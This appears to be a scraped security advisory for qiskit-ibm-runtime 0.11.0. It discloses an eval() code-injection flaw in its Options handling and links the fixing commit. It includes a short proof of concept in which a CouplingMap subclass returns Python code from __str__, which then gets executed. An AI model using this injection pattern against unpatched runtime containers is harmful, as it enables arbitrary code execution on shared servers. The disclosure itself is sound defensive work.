Dynamic Variable Evaluation in qiskit-ibm-runtime

2024-03-2015:41:26

Google

osv.dev

eval method

options

code injection

qiskit

coupling map

vulnerability

runtime

qasm simulator

7.6 High

AI Score

Confidence

High

JSON

Summary

An eval() method exists Options._get_program_inputs. This is bad in any case, but especially bad because Options are also used server side, so this has the potential to expose arbitrary code injection in runtime containers, now or at a later time.

Details

https://github.com/Qiskit/qiskit-ibm-runtime/blob/da94a42060f1a22e6f306227deb45b70e0075723/qiskit_ibm_runtime/options/options.py#L140

PoC

A local exploit would be something like

from qiskit import transpiler

class BadActor(transpiler.CouplingMap):
    def __str__(self):
        return "print('external code')"

Where print("external code") can be any arbitrary python code string.

Then if you did a normal workflow and used a specifically constructed CouplingMap subclass like BadActor above:

from qiskit_ibm_runtime import QiskitRuntimeService, Session, Options, Sampler
from qiskit import QuantumCircuit

cmap = BadActor.from_line(42)
service = QiskitRuntimeService()
options = Options(optimization_level=1)
options.simulator = dict(coupling_map=cmap))

bell = QuantumCircuit(2)
bell.h(0)
bell.cx(0, 1)
bell.measure_all()

with Session(service=service, backend="ibmq_qasm_simulator") as session:
    sampler = Sampler(session=session, options=options).run(bell)

This will print external code

Impact

Security vulnerability.

CPENameOperatorVersion
qiskit-ibm-runtimeeq0.11.0

CPE	Name	Operator	Version
	qiskit-ibm-runtime	eq	0.11.0

References

github.com/Qiskit/qiskit-ibm-runtime

github.com/Qiskit/qiskit-ibm-runtime/commit/2e8c8c8df83ba310f52d1651a426bad879e0bd38

github.com/Qiskit/qiskit-ibm-runtime/security/advisories/GHSA-cq96-9974-v8hm

7.6 High

AI Score

Confidence

High

JSON